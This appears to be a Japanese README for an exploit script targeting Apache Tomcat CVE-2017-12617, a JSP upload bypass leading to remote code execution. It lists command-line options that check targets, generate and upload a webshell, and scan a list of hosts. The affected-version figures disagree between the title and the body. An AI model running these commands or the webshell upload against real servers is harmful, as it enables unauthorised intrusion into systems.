
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSPアップロードバイパス / リモートコード実行
Apache Tomcat で発見された重大なリモートコード実行 (RCE) 脆弱性 CVE-2017-12617
HTTP PUT が有効なシステム(Default サーブレットの "read-only" 初期化パラメータを "false" に設定)が影響を受けます。
9.0.1 (Beta)、8.5.23、8.0.47、7.0.82 より前の Tomcat バージョンには、default サーブレットが
パラメータ readonly を false に設定して構成されている場合、または WebDAV サーブレットが
パラメータ readonly を false に設定して有効になっている場合、すべてのオペレーティングシステムにおいて
潜在的に危険なリモートコード実行 (RCE) 脆弱性が存在します。
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt